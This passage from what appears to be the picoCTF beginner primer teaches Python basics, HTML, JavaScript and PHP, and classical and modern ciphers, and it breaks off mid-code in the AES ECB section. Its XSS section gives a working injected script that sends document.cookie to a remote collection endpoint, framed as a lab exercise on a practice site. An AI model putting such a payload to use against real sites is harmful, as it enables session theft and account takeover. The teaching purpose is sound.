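A bare except hides what actually went wrong. As a hedged sketch (using fixed values instead of input() so it runs on its own), you can capture the exception object to see its description:

```python
num1 = 8
num2 = 0  # a value we know will fail
try:
    result = num1 / num2
    print(result)
except Exception as error:
    # The exception object carries a description of what went wrong.
    message = "Something failed: " + str(error)
    print(message)
print("The program keeps executing to do other stuff...")
```

Running this prints "Something failed: division by zero" and then keeps going, just like the version above.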
If you want to be more specific, you can catch specific errors in the following manner:

```
num1 = 8
print("Input the number that will divide:")
try:
    num2 = int(input())
    result = num1 / num2
    print(result)
except ZeroDivisionError:
    print("Do not divide by zero, that is forbidden.")
except ValueError:
    print("Your input value must be an integer.")
print("The program keeps executing to do other stuff...")
```

Now when you input a string, it will show this:

```
Input the number that will divide:
"Any string"
Your input value must be an integer.
The program keeps executing to do other stuff...
```

And if you input zero it will show this:

```
Input the number that will divide:
0
Do not divide by zero, that is forbidden.
The program keeps executing to do other stuff...
```

Note that when an error occurs, the following lines inside the 'try' block will not execute. See that 'result' is not printed, which makes sense because there was no result to print. The program jumps into the 'except' block immediately.

### 4.6. Pass arguments to a python program

When you call a program from the command line, it is possible to pass arguments to it, just as you do with many other programs in the terminal. The following program shows how to do this:

```
import sys

print('Number of arguments:', len(sys.argv), 'arguments.')
print('Argument List:', str(sys.argv))

# The number of iterations is taken from the second argument.
# (Remember that in a list, [0] is the first element and [1] is the second one.)
number_iterations = sys.argv[1]

f = open("output2.txt", "w")
for i in range(int(number_iterations)):
    if i < 5:
        f.write("The following number is less than 5\n")
    else:
        f.write("The following number is greater than or equal to 5\n")
    f.write(str(i)+"\n")
f.close()
print("look inside your folder...")
```

Put this code into a file called "args.py". If you run it without any arguments, it will throw an error:

```
$ python3 args.py
Number of arguments: 1 arguments.
Argument List: ['args.py']
Traceback (most recent call last):
  File "args.py", line 8, in <module>
    number_iterations = sys.argv[1]
IndexError: list index out of range
```

This error happened because the program expects an argument on the command line, but none was given. More specifically, the second element of the argument list is queried with `sys.argv[1]`, but it doesn't exist! Do take note, however, that even without supplying any arguments to the program, the program name itself counts as the first argument. To run this program properly, we must include an integer argument in our program call:

```
$ python3 args.py 6
Number of arguments: 2 arguments.
Argument List: ['args.py', '6']
look inside your folder...
$ cat output2.txt
The following number is less than 5
0
The following number is less than 5
1
The following number is less than 5
2
The following number is less than 5
3
The following number is less than 5
4
The following number is greater than or equal to 5
5
```

Take note that since we did not use `with` to open our file, we had to close it manually with the line:

`f.close()`

### 4.7. ASCII

ASCII is a way in which a computer represents characters. We could say that in memory a computer only stores numbers, but a program can interpret those numbers in a certain way to understand them as characters. An ASCII table shows what number corresponds to each character; you can easily find one by searching for "ASCII table" online. ASCII includes all the characters that are used in the English language. For other languages, there is a bigger character set called Unicode. For example, in the ASCII table, you can see that the @ symbol is represented by the number 64 in decimal. The table also has a column called Hx, or Hexadecimal, which is base 16. Decimal is base 10. The decimal base is the one we use in everyday life, which likely comes from the fact that humans have 10 fingers; therefore, we have 10 different symbols to represent all numbers.
In computers, it is helpful to have a base with 16 symbols because it translates easily to binary. You probably know that most computers physically store only binary numbers, which are represented only by 0 and 1. A **b**inary dig**it** is called a bit. Although computers use binary, base 16 is easy for us humans to translate from binary. The hexadecimal base (or base 16) has the following symbols:

`0 1 2 3 4 5 6 7 8 9 a b c d e f`

The binary base (or base 2) has these symbols:

`0 1`

The decimal base (or base 10) has the following symbols:

`0 1 2 3 4 5 6 7 8 9`

Let's see in Python how we can use the hexadecimal representation to print characters. In a Python string, you can put "\x", which is a special sequence that tells Python that the following two characters are a hexadecimal number:

```
print("picoCTF")
print("\x70\x69\x63\x6f\x43\x54\x46")
```

When you run that program you should see:

```
picoCTF
picoCTF
```

Check the table to see that the characters match! As a challenge, print the string "I_LOVE_PICOCTF" using only hexadecimal. Note that uppercase letters are represented by different hexadecimal numbers than lowercase letters.

### 4.8. Pwntools

For binary exploitation, there is a very useful library called pwntools. Keep this library in mind as an important part of Python for exploitation. You do not need to learn anything about it right now; we will teach you how to use it in the binary exploitation section.

### 4.9. HTTP requests in Python

Below is an example of how you can request a web page in Python. Here we are requesting the HTML of the picoCTF website. Right now you may not know HTML, and worry that this will not make much sense to you.
After you are done with the Web section, come back here and try this example:

```
import http.client

conn = http.client.HTTPSConnection("picoctf.org")
conn.request("GET", "/")
r1 = conn.getresponse()
print(r1.status, r1.reason)
# 200 OK
data1 = r1.read()
conn.request("GET", "/a")
r2 = conn.getresponse()
print(r2.status, r2.reason)
# 404 Not Found
data2 = r2.read()
conn.close()
```

## 5. Web Exploits

##### Samuel Sabogal Pardo

Web exploits are a nice starting point to dive into the world of hacking. Chances are that you are familiar with a web browser, so you will feel you are working on something that you already know!

### 5.1. Html

Before diving into Web Exploits, you need to understand how a website works. Many years ago, the web was used to visit static pages that did not have interactive features; they just showed information. To make a static page, it is enough to write some lines of HTML. What is HTML? First, it is not a programming language. HTML stands for HyperText Markup Language, and we use it to determine the font size, colors, margins, and similar features of a web page. When an html file is accessed in a browser like Firefox, Chrome, or whichever browser you like, the browser presents the text according to the html in it. Your browser can access an html file locally, meaning the file is on your own computer's file system; in contrast, it could access the file remotely through the Internet. Let's see an example of creating a simple html file and accessing it locally:

- On your computer, create a folder called "picoexample" and then, inside that folder, create a text file and name it "myFirstPage.html". You can do this with Notepad on Windows, TextEdit on Mac, or any text editor on Linux. It is important that the extension is ".html". It cannot be ".html.txt" or anything that is not exactly ".html". If you don't see the extension in your operating system, this is a good opportunity to google how to make it appear so you can modify it.
Remember, for obstacles that might appear along the way, google is the answer.

- Edit the content in a text editor and write: Hello World!
- Save the file.
- Open the file in any browser. To do that, you can right click on the file, then select "open with" and choose the browser you want. You should see a page like the following:
- Now, in the text editor, modify the content of the file and replace the text with: <b>Hello World!</b>
- Save the file in the text editor. Then, open the file in the browser again, or simply click refresh in your browser. Since it already has the file open, you will see the message in bold, similar to this:

You just created a page with a very simple HTML tag that made your message appear in bold. Note that <b> is the opening tag and </b> is the closing tag. Analyze the difference between the opening and closing tag. What do you see? The closing tag is usually the same as the opening tag, but with a "/" added, like we just did. We just used an html tag to tell the browser we want some specific text in bold. Html is just a bunch of tags that allow us to do similar things. Now let's make a page with more fields so you can get a sense of tags and the structure of a bigger page. Use the following HTML code to replace the content of the file you are editing:

```
<html>
<head>
    <title>This is a picoCTF html Example</title>
</head>
<body>
    <h1>This is a Heading</h1>
    <h2>This is a smaller Heading</h2>
    <p>This is a paragraph.</p>
    The following is an image:<br>
    <img src="picologo.png" />
</body>
</html>
```

As you did before, save the file in the text editor and click refresh in the browser. You will probably see something like this: If you read the html code and try to analyze its content, you will realize the following:

- The title shown in that tab of the browser, "This is a picoCTF html Example", appears there because you put that text inside the <title></title> tags.
- <h1> is used to create a big heading.
- <h2> creates a heading smaller than <h1>.
- The <head> tags are used to group introductory content, in this case the title. If you remove this tag, you will not see much change in our page. Do the experiment of removing it. If you only remove the opening or the closing tag it will cause an html error, so make sure to delete both the opening tag and the closing tag.
- The <body> tags are used to group the main content of the page. If you remove them you will not see much change in our page, because we have just a few things. However, in many cases you might break a page completely if you remove a tag without proper care.

You may have noticed the <img> tag is not showing any image as it should. Why? Let's analyze the img element:

`<img src="picologo.png" />`

First, notice that there is no separate opening and closing tag; there is just a single tag with the slash at the right-hand side. This is ok for an image. As you can see, it has an **attribute** called "src", which means source. We are assigning to "src" the value "picologo.png". Our html is going to try to access a file called "picologo.png" in the same folder where "myFirstPage.html" is contained, which is the folder we first named "picoexample". There is no image called "picologo.png", so the browser has nothing to show. Copy and paste an image into the folder and name it "picologo.png", so that it matches the value of the "src" attribute. If you have an image with a different extension, you can simply use the extension you need in the "src" attribute in your html. For example, if the extension of the image you have is ".jpg", you can simply replace

`<img src="picologo.png" />`

with

`<img src="picologo.jpg" />`

If you successfully placed the image in the folder and refresh the browser, you will see the following, of course, with your own custom image: A fundamental part of websites are links.
The link tag is **<a>**; the following is an example of a link directed to google:

`<a href="http://google.com" > Go to google! </a>`

Use that element in your code to make a link to any website you want. Now practice by adding more html tags and images to your page! This is a reference in which you can find more html tags:

### 5.2. JavaScript

To make pages more interactive, JavaScript is commonly used. JavaScript is a programming language! We can write algorithms with it. JavaScript is executed in your browser. For example, when you visit a website, the JavaScript code is downloaded along with the HTML, and it only executes once it is loaded in your browser. When you visit a page, you are downloading an html file, and your browser interprets the tags and prints the text and images as we learned before. This image illustrates that process: If that file happens to contain JavaScript, your browser will execute it. Let's look at an example. In the same folder "picoexample", create a file called "myFirstJS.html" using a text editor. Then, put the following content in the file:

```
<html>
<head>
    <title>This is a picoCTF JS Example</title>
    <script>
        alert("Hello picoCTF");
    </script>
</head>
<body>
    <h1>JavaScript example</h1>
</body>
</html>
```

Save the file. As soon as you open the page, you will see an alert showing "Hello picoCTF", something like this: If you analyze the file, you will note that the magic is happening in this element:

```
<script>
    alert("Hello picoCTF");
</script>
```

Whatever you put inside the tags "<script> </script>" the browser will try to execute as JavaScript. Since JavaScript is a programming language, we should be able to do some arithmetic. Replace the string "Hello picoCTF" with an arithmetic operation, like 8*8, like this:

```
<script>
    alert(8*8);
</script>
```

Note that we only use quotes when we want a string. In arithmetic operations we don't use quotes. Save the file and refresh the browser.
You should see the following: Click Ok in the alert message to make it go away. Anything you write in JavaScript or html will be visible to any user who accesses your page in a browser. To see the html and JavaScript code in your browser, right click the page and then select "View Page Source". You will see the JavaScript code you just wrote: This is a very important thing! Never put a secret in your JavaScript code or html. If someone does, that will be a vulnerability in their page. As a hacker, you can look for secrets in the html of a page you want to exploit. Now let's use some more elaborate code. We are going to make a page that adds two numbers input by the user and shows the result in an alert. We will explain its code in detail later. The code is the following:

```
<html>
<head>
    <title>This is a picoCTF JS Example</title>
    <script>
        function myFunctionSum(){
            var number1 = document.getElementById("number1").value;
            var number2 = document.getElementById("number2").value;
            var result = Number(number1) + Number(number2);
            alert(result);
        }
    </script>
</head>
<body>
    <h1>JavaScript example to add 2 numbers</h1>
    Input the first number<br>
    <input type="text" id="number1" ><br>
    Input the second number<br>
    <input type="text" id="number2" ><br>
    <button onclick="myFunctionSum()"> Show alert! </button>
</body>
</html>
```

Put it in a text file, save it, and open it in a browser as usual. You should see this: If you put a number in each text field and click "Show alert!", you will see the alert with the result. For this example, let's input 4 and 2 in the text fields; you should see: Now that you know what the page does, let's analyze the new lines of the code. In this line we have an input tag:

`<input type="text" id="number1" ><br>`

As you can see, it is of type text, and it has an "id" with the value "number1". The value of the "id", in this case "number1", is something we arbitrarily define to be able to access the content of this text input from JavaScript.
This line:

`<button onclick="myFunctionSum()"> Show alert! </button>`

is responsible for calling the function "myFunctionSum()" when the button is clicked. A function is just a piece of code that we can define, so that whenever it is called it executes the code inside. In this case, we named the function "myFunctionSum", but it is possible to give it any name. The function has to be defined inside the script tags. Try to read the function and understand at a general level what each line is doing:

```
function myFunctionSum(){
    var number1 = document.getElementById("number1").value;
    var number2 = document.getElementById("number2").value;
    var result = Number(number1) + Number(number2);
    alert(result);
}
```

Perhaps a confusing part is the following line:

`var result = Number(number1) + Number(number2);`

When the variables are defined, both number1 and number2 are strings, not numbers. This line turns them into numbers before adding them together. Why don't you experiment and see what happens when these variables aren't converted to numbers? Challenge! Modify the file to multiply the two numbers. When you are done with that, include a new third input to multiply three different numbers! At this point you should be able to do it on your own. Be careful with the syntax; remember that a single wrong character might break the whole code.

### 5.3. Server code

As we said previously, JavaScript is executed only in the browser. What if you want to do calculations and store data on the remote server? For example, when you log in to a website, your user and password have to be verified on the server. The password is stored on the server and, for the sake of security, should not travel outside of it. If you verified a password in JavaScript, you would be able to see it in your browser in the same way you can see any JavaScript, and that would be very insecure.
There are several programming languages that can be executed on the server, for instance:

- Python
- Java
- PHP
- C
- C Sharp
- And many more…

For our examples, we will begin with PHP, not because we think it is a great language, but because a huge number of websites on the Internet use it, and it is very easy to learn and deploy. In any case, as a hacker, you should generally learn all the languages you can, because different websites are made in different languages, as are the CTF challenges that try to simulate real life! The more a language is used, the more likely you will have to attack a website made with it. However, the vulnerabilities we will explain can happen in any programming language, because they are not a fault of the language, but a fault of the programmer who made the website. Suppose you have a text file named hello.php, containing:

```
<b>Hello World!</b>
<script>
    alert('Hello World from JavaScript!');
</script>
<?php
    echo "Hello World from PHP!";
?>
```

Note that in a file with the extension .php you can mix html, JavaScript, and PHP code! If the server supports PHP, everything inside **<?php ?>** will be understood as PHP code and run by the server, not by the browser. Look at the following image carefully to understand what happens: If you open a file with that content on your laptop, the PHP code will not be executed, because your laptop is not a PHP server (if you have not made it one). So, to execute PHP you need to make your laptop a server. But for the time being, we can use the following: Access that link, and you will see at the right a file with html and PHP code that, when run, prints "My first PHP script!". Let's modify the code to additionally print the date, so below the line

`echo "My first PHP script!";`

add the line

`echo date("H:i:s");`

According to what you have learned so far, is that time from the clock on your computer, or from the clock on the server?
…PHP is server side code, so that time is from the clock on the server! Now let's make an experiment, and add another line with this php code:

`echo "<script> alert('Hello World from JavaScript!'); </script>";`

That string echoed by PHP contains JavaScript code. Is the JavaScript alert shown? What happened? As expected, anything printed by PHP becomes an integral part of the downloaded html file, so the JavaScript will be executed. This opens the door for the famous attack of Cross Site Scripting (XSS).

### 5.4. Cross Site Scripting (XSS)

After you log in to a website, the website needs a way to know that any request coming from your browser is coming from a user that previously logged in, without the need to send the user and password again. To do that, the website can send your browser a secret random value after login. That value is generally stored in a cookie or in JavaScript local storage. For this example, let's pretend it is stored in a cookie, which is simply a variable in your browser that can retain data. If a website sets a specific cookie in your browser, your browser automatically re-sends that cookie in each request to the website. If a website only uses cookies to retain a session, and a hacker can steal the authentication cookie from you, they could pretend to be you! Note that only using cookies for authentication opens the possibility of Cross Site Request Forgery (CSRF), but this will be explained later; for now let's focus on XSS. Suppose you are a hacker on a social network. When you create your account, instead of using your name, you input JavaScript code. When a friend of yours visits your profile, the website will try to print your name, but your name is actually JavaScript code, so the browser might execute that JavaScript code. In that way, you could execute your own JavaScript in your friend's browser!
When you get to execute JavaScript in someone else's browser, you can read their authentication data, which can be a secret value placed in a cookie or JavaScript local storage after a user logs in. At that point, your friend's account would probably be compromised!

An important skill to have is knowing how to use the browser debugger. For this explanation we will use Firefox. You can download and install Firefox here:

Note: If you really don't want to use Firefox, every browser has a debugger, and you can google how to use it. It will not be that different.

Using Firefox, input your name and some text in the description in the following link:

Open another tab and visit the following link. You should see your name and description:

Now, in the Firefox Menu, click "Web Developer" and then click "Debugger". You should see a pane like the following:

In that pane, click "Storage". At the left click "Cookies" and click the domain you are currently on. You will see a cookie that has your name in the value! You can only see your cookie. Other users would see their cookie with their name. For this experiment, you will steal your own cookie. But with the same method, you could steal the cookie of someone else. For now, access this link again:

Create a new user that has your name, but instead of the description has the following code:

`<script> alert('I just injected Javascript!'); </script>`

If you visit this link again, you will see your JavaScript code triggered, like this:

You just verified that you can inject JavaScript in the website. Now we are going to inject JavaScript that will steal the cookie.
Create another user in the same link for creating users:

But now, put this JavaScript code in the description:

```
<script src="https://code.jquery.com/jquery-3.4.1.min.js">
</script>
<script>
$.get(
  "https://primer.picoctf.org/vuln/web/insert.php",
  {cookie : document.cookie, hackername : 'YourName'},
  function(data) {
    alert("I just stole the cookie!");
  }
);
</script>
```

Let's understand the code. The first line imports a library called jquery:

`<script src="https://code.jquery.com/jquery-3.4.1.min.js"> </script>`

A library is a set of functions that allow us to do some actions in an easier manner. In this case, it allows us to make requests and send data from JavaScript to a server. We are just sending the cookie to a remote service that is made to receive cookies from this exercise. That service receives two variables: "cookie" and "hackername". The value of the variable cookie will be "document.cookie". Here, instead of "=", we use ":" to assign a value to a variable. Using document.cookie you access the cookies from JavaScript, so that should contain the cookie you want to steal. The variable hackername simply has a name assigned. You could replace the string "YourName" with your actual name. Remember that a string must be inside quotes in JavaScript. The function:

```
function(data){
  alert("I just stole the cookie!");
}
```

is simply a function that will be executed after the request is sent to the service, and will alert a message. Now visit this site again:

When a user visits that site, the JavaScript is executed and the cookie is stolen. You should see the message:

If you injected scripts previously, all those scripts are stored in the website and will be executed, in the order you injected them, when the page that prints them is visited. Now you should be able to see the cookie you stole here:

At this point you should have some understanding of how a website works. You are ready to begin to do more web challenges on picoCTF!

## 6.
Cryptography

##### Samuel Sabogal Pardo

Cryptography is an ancient field that dates back to ancient Rome. Etymologically, the word traces back to the Greek roots "kryptos" meaning "hidden" and "graphein" meaning "to write." It is used to communicate secretly in the presence of an enemy. With cryptography we can achieve the following properties when a message is sent:

- Confidentiality: No one unintended will be able to read the message.
- Integrity: If a message is tampered with, it is possible to detect that it was.
- Authentication: The identity of a person can be verified accurately.
- Nonrepudiation: If a person sent a specific message, then the person cannot deny having sent it.

First, we will see how to achieve Confidentiality. This is done with encryption. When we want to hide a message, we say that we encrypt the message. To understand how encryption works, we will see an example of an ancient way of encrypting a message that is not secure by any means today, but is good for illustration. But first, to practice our terminal skills, we will encrypt a folder in linux to prevent anyone from reading its contents without the appropriate password.

### 6.1. Practical example

To use cryptography in real life, you should never use your own implementations. To begin, we will demonstrate how to encrypt a file without needing any knowledge of cryptography. Go to the picoCTF webshell at:

When you are there, create a file called 'my_name.txt' containing your name. You could use the 'nano' editor, but in linux it is possible to do the following trick: If your name was 'samuel', you would run the following command to create the text file:

`echo "samuel" > my_name.txt`

The 'echo' command simply outputs a string, and we are redirecting that output to a file. For example, if we just run

`echo "samuel"`

You will simply see 'samuel' printed on the screen.
Now run:

`ls`

and you will see the file you created:

```
ls
my_name.txt
```

If you run the command:

`cat my_name.txt`

you will see the content:

```
cat my_name.txt
samuel
```

Now, create another file with your last name called 'my_lastname.txt'. You can use the same technique to create 'my_lastname.txt':

`echo "pardo" > my_lastname.txt`

We will move both files to a new folder, then compress that folder, and then encrypt it! Compressing a folder just makes several files or folders appear as a single file that takes less space on disk, but compressing does not provide any security. Anyone would be able to simply decompress it and see the original content. However, encryption will prevent obtaining the original content without the key. To do that experiment, create a directory called 'my_info':

`mkdir my_info`

And move both files inside using the command mv (mv means move):

```
mv my_name.txt my_info/
mv my_lastname.txt my_info/
```

Navigate to the folder 'my_info' and make sure that it contains the files. Now, go back outside the my_info folder, and compress the folder into a zip file by running:

`zip -r my_info.zip my_info/`

Note that my_info.zip is the name we chose for our compressed file, and '-r' means recursively, which in this case means that we want to compress everything inside the folder. If you run

`ls`

You should see the folder and the compressed file:

```
ls
my_info  my_info.zip
```

Now remove the folder by running:

`rm -r my_info`

'rm' means remove, and '-r' means recursively and indicates we want to remove everything in the folder. Now, if you run

`ls`

you should see only your compressed file:

```
ls
my_info.zip
```

You could easily uncompress the folder by running:

`unzip my_info.zip`

And obtain the original folder:

```
ls
my_info  my_info.zip
```

Now, let's create a zip file protected with encryption, so it cannot be uncompressed without a key. In this context, the words 'key' and 'password' are synonyms.
Let's first remove the .zip file we already created by running:

`rm my_info.zip`

Now, let's create our encrypted zip, by using a password, with the following command:

`zip --encrypt -r my_protected_info.zip my_info/`

You will be asked to input a password and verify it, so remember the password you use to be able to decrypt it later:

```
zip --encrypt -r my_protected_info.zip my_info/
Enter password:
Verify password:
  adding: my_info/ (stored 0%)
  adding: my_info/my_name.txt (stored 0%)
  adding: my_info/my_lastname.txt (stored 0%)
```

If you run:

`unzip my_protected_info.zip`

It will ask for the password, and only if you input the correct password will you get back the original content!

```
Archive:  my_protected_info.zip
   creating: my_info/
[my_protected_info.zip] my_info/my_name.txt password:
 extracting: my_info/my_name.txt
 extracting: my_info/my_lastname.txt
```

It is not possible to obtain the original content without the password because the password is used to do operations with the content to obtain the resulting encrypted file. At this point you might have no idea of what happened. Many encryption algorithms have been created since ancient Rome. Old ways of encrypting data are easily broken nowadays. Even relatively new ways of encrypting data are broken easily today. Some of them are considered unbreakable right now, but will be broken in the future. Let's begin to understand how encryption works!

### 6.2. Substitution ciphers

"Cipher" means a secret or disguised way of writing a message. It can be thought of as the same as encryption. One cipher method invented in ancient Rome is Caesar's cipher, named after Julius Caesar, who used it for his private communication. This cipher simply substitutes each of the letters of a word by another one that is a certain number of positions further in the alphabet. That "certain number of positions" is called the shift.
For example, if we have the word "hello" and we want to encrypt it using Caesar's cipher with a shift of 3, we would replace the 'h' by 'k' because 'k' is 3 positions further in the alphabet, the 'e' by 'h' for the same reason, and so on. We call the original text we want to encrypt the cleartext or plaintext. The result of encrypting 'hello' using Caesar's cipher with a shift of 3 is the following:

cleartext → h e l l o

Encrypted text → k h o o r

"Decrypting" means obtaining the clear text from the encrypted text. For Caesar's cipher we simply do the same but in reverse; we subtract 3 positions in the alphabet from each letter. Note that when we get to the end of the alphabet while adding positions during encryption, we simply wrap around the alphabet. For example, to encrypt the letter 'z', we would use the letter 'c'. To make sure you understand the decryption, decrypt the following text using Caesar cipher with a shift of 3:

s l f r f w i

The result is something you probably know. Hint: the first decrypted letter is 'p'. Caesar's cipher is a **substitution cipher**, because it replaces each letter by something else. In a substitution cipher, you don't necessarily need to replace a letter by another letter. You can use any symbol if you know how to reverse it. To practice, go to the webshell. Once you are there, create a python script using:

`nano caesar.py`

We will use a python code that encrypts and decrypts only lowercase letters using Caesar cipher.
This is how it looks:

```
def caesar_encrypt(text):
    result = ""
    # Go through each character of the text in this for loop
    for i in range(len(text)):
        # Obtain the ASCII value using ord
        char_position = ord(text[i])
        # Subtract 97 to get a position from 0 to 25
        char_position = char_position - 97
        # Add 3 to the position, as Caesar's cipher does
        new_char_position = char_position + 3
        # Make sure that the position does not surpass 25 (we wrap around)
        new_char_position = new_char_position % 26
        # Convert back to ASCII values
        new_char_position = new_char_position + 97
        # Convert ASCII value to character and concatenate it to final result
        result = result + chr(new_char_position)
        print(result)
    return result


def caesar_decrypt(cipher_text):
    result = ""
    # Go through each character of the text in this for loop
    for i in range(len(cipher_text)):
        # Obtain the ASCII value using ord
        char_position = ord(cipher_text[i])
        # Subtract 97 to get a position from 0 to 25
        char_position = char_position - 97
        # Subtract 3 from the position, to get back the original position
        new_char_position = char_position - 3
        # Make sure that the position does not go below 0 (we wrap around)
        new_char_position = new_char_position % 26
        # Convert back to ASCII values
        new_char_position = new_char_position + 97
        # Convert ASCII value to character and concatenate it to final result
        result = result + chr(new_char_position)
        print(result)
    return result


text = "picoctf"
print(f"Plain Text: {text}")
cipher_text = caesar_encrypt(text)
print(f"Encrypted: {cipher_text}")
print(f"Decrypted: {caesar_decrypt(cipher_text)}")
```

Copy and paste the code into the file, save the file by pressing control+x, then 'y', then enter, and then execute it with:

`python3 caesar.py`

You should see the following output:

```
Plain Text: picoctf
s
sl
slf
slfr
slfrf
slfrfw
slfrfwi
Encrypted: slfrfwi
p
pi
pic
pico
picoc
picoct
picoctf
Decrypted: picoctf
```

Read the comments in the python source code to understand it.
You probably noted the '%', which is called the modulo operator. It allows us to wrap a number around, because it calculates the remainder of the division. We will see more detail on this in the future, so do not worry too much about it for now. But know that if we want a number to start from 0 again when it surpasses a certain threshold, we can use the modulo operator. In this case, we use it because we only have 26 letters in the English alphabet. So, the first position is 0, which contains 'a', because arrays start at zero. The last position is 25, which contains 'z'. So, if we want to encrypt 'z', we would need to add 3 positions, and 25+3 is 28, but after 25 we need to begin from 0 again because of the way that Caesar's cipher works. The modulo operator works perfectly for that because:

26%26 is 0

27%26 is 1

28%26 is 2

So, as we said before in an example, the letter 'z' would be encrypted with 'c', which is in position 2, considering that arrays start at 0. Another thing that you may not have understood at first from the code is that we subtracted 97 from the ASCII value. Go to:

Note that the letter 'a' is in position 97, so we simply subtract 97 to apply the wrap-around trick with modulo 26.
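These facts are easy to check directly in Python (a quick sanity check, separate from the caesar.py script):

```python
# The modulo operator wraps numbers around a threshold:
print(26 % 26)  # 0
print(27 % 26)  # 1
print(28 % 26)  # 2

# 'a' sits at ASCII position 97, so subtracting 97 maps 'a'..'z' to 0..25:
print(ord('a'))  # 97

# Encrypting 'z' with a shift of 3 wraps around to 'c':
print(chr((ord('z') - 97 + 3) % 26 + 97))  # c
```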
Note that for this particular plaintext the trick also works without subtracting 97, by instead applying modulo 123, like in the following code:

```
def caesar_encrypt(text):
    result = ""
    # Go through each character of the text in this for loop
    for i in range(len(text)):
        # Obtain the ASCII value using ord
        char_position = ord(text[i])
        # Add 3 to the position, as Caesar's cipher does
        new_char_position = char_position + 3
        new_char_position = new_char_position % 123
        # Convert ASCII value to character and concatenate it to final result
        result = result + chr(new_char_position)
        print(result)
    return result


def caesar_decrypt(cipher_text):
    result = ""
    # Go through each character of the text in this for loop
    for i in range(len(cipher_text)):
        # Obtain the ASCII value using ord
        char_position = ord(cipher_text[i])
        # Subtract 3 from the position, to get back the original position
        new_char_position = char_position - 3
        new_char_position = new_char_position % 123
        # Convert ASCII value to character and concatenate it to final result
        result = result + chr(new_char_position)
        print(result)
    return result


text = "picoctf"
print(f"Plain Text: {text}")
cipher_text = caesar_encrypt(text)
print(f"Encrypted: {cipher_text}")
print(f"Decrypted: {caesar_decrypt(cipher_text)}")
```

Can you explain why? (Hint: think about what would happen to letters near the end of the alphabet, like 'z'.)

Challenge: Modify the python script to be able to encrypt and decrypt upper case words.

### 6.3. Transposition ciphers

In transposition ciphers, we don't replace the letters by other symbols; we simply change the order in which they appear in the cleartext. For example, we can decide that our encryption algorithm simply moves the letters to the right, wrapping around. Let's encrypt the word 'pico' by rotating its letters by one position to the right.

clear text → p i c o

encrypted text → o p i c

This is a very simple kind of transposition. But you can have a map that makes more complicated transpositions.
For instance, you can decide that you will encrypt a text by doing transpositions in chunks of 6 letters using the following mapping:

The numbers indicate the positions of the letters. Using that mapping, let's encrypt the word 'pico'. Since pico only has 4 letters, we can simply use padding to complete 6 letters. For this example, we will use the symbol * as padding, so we have:

The encrypted word is 'c*ip*o' using our arbitrarily defined mapping. Suppose we want to encrypt a long text. In that case we simply apply the same mapping every 6 characters. So far, we saw how transposition and substitution ciphers work. If they are used only by themselves, they are very easy to crack. Moreover, if someone finds out the algorithm we use to encrypt, the encryption is broken forever! A way to improve this is by using encryption algorithms based on a key.

### 6.4. Key ciphers

There is a principle in cryptography called Kerckhoffs's principle that states: "A cryptosystem should be secure even if everything about the system, except the key, is public knowledge". That principle addresses the fact that once the enemy knows the encryption algorithm, the encryption is broken. The solution is to use a key. One old algorithm that encrypts data using a key is "Vigenere". It certainly looks stronger than the previous algorithms we learned. Even though it is easily breakable nowadays, in its time it was considered unbreakable. To understand how Vigenere works we will encrypt the cleartext:

"I LOVE PITTSBURGH"

First, we remove the spaces, because the Vigenere table does not include the space character. However, a human can easily recognize the words of a text even if it has no spaces. We get:

"ILOVEPITTSBURGH"

Now, we can pick a key. For this example, we will use the key "PICOCTF".
Since our text is larger than the key, we simply repeat the key several times until we get the same length, in the following manner:

Plaintext: ILOVEPITTSBURGH

Key: PICOCTFPICOCTFP

The first letter of the cleartext is paired with the first letter of the key. So, we have the pair ('I','P'). Now, in the Vigenere table that is presented below, we use row I and column P. The cell at the intersection of the column and the row will be the encrypted letter, which in this case is X. We do the same for the rest of the letters, and we obtain the following:

Cleartext: ILOVEPITTSBURGH

Key: PICOCTFPICOCTFP

Encrypted text: XTQJGINIBUPWKLW

Now let's see how decryption works. Suppose we only have the key and the encrypted text:

Key: PICOCTFPICOCTFP

Encrypted text: XTQJGINIBUPWKLW

We take the first letter of the key, which is 'P', and go to that row in the Vigenere table. Then, in the row 'P', we find the first letter of the encrypted text, which is 'X'. The column that corresponds to 'X' is the first letter of the clear text, which in our case is 'I'. You repeat the same process for each character until you get 'ILOVEPITTSBURGH'. To verify that you understand the decryption, decrypt the encrypted text "WMNZQAJ" using the key "HELLO"; remember that if the key is shorter, you just repeat it. You should obtain a word you will easily recognize!

Vigenere is easily broken even without a computer. Simon Singh, a famous science communicator, has a nice tool on his website for cracking Vigenere:

Cracking ciphers is a field in itself called cryptanalysis. Cryptanalysis and cryptography compose a bigger field called cryptology.

### 6.5. Modern cryptography

In modern cryptography there exist the concepts of symmetric and asymmetric cryptography. Symmetric cryptography means that you use the same key for encryption and decryption, as we just did with Vigenere. In asymmetric cryptography you have two keys. One is for encryption, known as the public key; the other one is for decryption, known as the private key.
Asymmetric cryptography is useful because it can be used to solve the problem of key exchange. Additionally, it can be applied to digital signatures, which provide integrity and non-repudiation.

#### 6.5.1. Symmetric crypto example: AES

A commonly used algorithm today for symmetric cryptography is AES, which means "Advanced Encryption Standard". This algorithm uses a combination of substitutions and transpositions with a key of fixed length. A key of fixed length means that the algorithm can only have a key with a certain size. However, AES has different versions, and each version supports a different key length. The most common versions are AES 128 and AES 256, which have key lengths of 128 and 256 bits respectively. The AES algorithm is considered secure. However, an implementation can be attacked successfully if it has flaws. For example, one famous way to break AES encryption is the Padding Oracle Attack, which made it possible to crack SSL, an encryption protocol that was widely used to secure HTTP traffic. However, this is not a weakness of AES, but a weakness in how it is used. AES has different operation modes. We will analyze two of them to illustrate vulnerabilities that can emerge in their use. These operation modes are "ECB" and "CBC".

##### Operation mode ECB

ECB means Electronic Code Book. In this operation mode we encrypt each block of the cleartext independently. For example, if we are using AES 128, we break the cleartext into chunks of 128 bits and use AES to encrypt them independently. This causes a problem because it leaks structure in the encrypted text. There is a famous example on the internet about an image of Tux (the penguin from linux) encrypted using AES in ECB operation mode:

Original image:

Encrypted image using AES on ECB mode:

You can see that it is easy to identify that the encrypted image contains the penguin. In other cases, this operation mode can be very bad for other reasons.
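Both weaknesses of ECB come from the same fact: every block is encrypted independently, so with a fixed key, equal plaintext blocks always produce equal ciphertext blocks. A toy sketch of the mode (the "block cipher" here is just a hash of the key plus the block, a deterministic stand-in for AES so the example runs without external libraries; it is not secure):

```python
import hashlib

def toy_block_encrypt(key: bytes, block: bytes) -> bytes:
    # Stand-in for a real block cipher: deterministic for a fixed key,
    # like AES, but NOT secure in any way.
    return hashlib.sha256(key + block).digest()[:16]

def toy_ecb_encrypt(key: bytes, plaintext: bytes) -> bytes:
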